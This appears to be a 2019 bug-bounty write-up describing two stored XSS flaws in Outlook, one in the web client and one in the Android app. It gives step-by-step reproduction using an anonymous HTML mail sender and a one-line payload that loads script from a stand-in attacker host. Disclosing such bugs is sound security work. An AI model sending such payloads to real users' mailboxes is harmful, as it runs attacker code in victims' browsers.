ElMahdi Mrhassel
Nov 28, 2019 · 2 min read

Hello This is my first write up And i will Write about my First bug in Outlook
Some services, such as Gmail, Outlook, Yahoo etc, allow sending messages to A e-mail in those services with HTML content [ Content-Type: text/html ], but they filter the message content and only allow some Tags such as A — H1 — img etc
But when I tried to try if Outlook was filtering the message content well, I found that it was not doing so well that it did not filter Tag link, which allowing to attacker to fetch an external file containing Javascript codes | Html Codes and execute them in the victim’s browser

Steps To Reproduce :

1. Go To https://emkei.cz/ ( I use this site to send messages because it allows me to send messages with Content Type “text/html” )
2. Add Any Things in ( From E-Name And From E-mail And Subject )
3. Add Your Email Hotmail Test On Input ( To )
4. Click On text/html In Content-Type
5. Put ( <link rel=import href=https://Evilcom/filepayload> ) On Input ( Text ) And Submit
6. And Sign In To Your Email Hotmail Test
7. And Click On The Message And The Payload Will Executed !

Proof Of Concept :

Bug 2 : XSS Stored In com.microsoft.office.outlook

After they fixed the first Bug , I downloaded their application on Android [ com.microsoft.office.outlook ] and tried to send to a message containing a Simple XSS Payload the same first way and the sudden thing is that the message is not filtered at all and All html tags is printed without filter

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade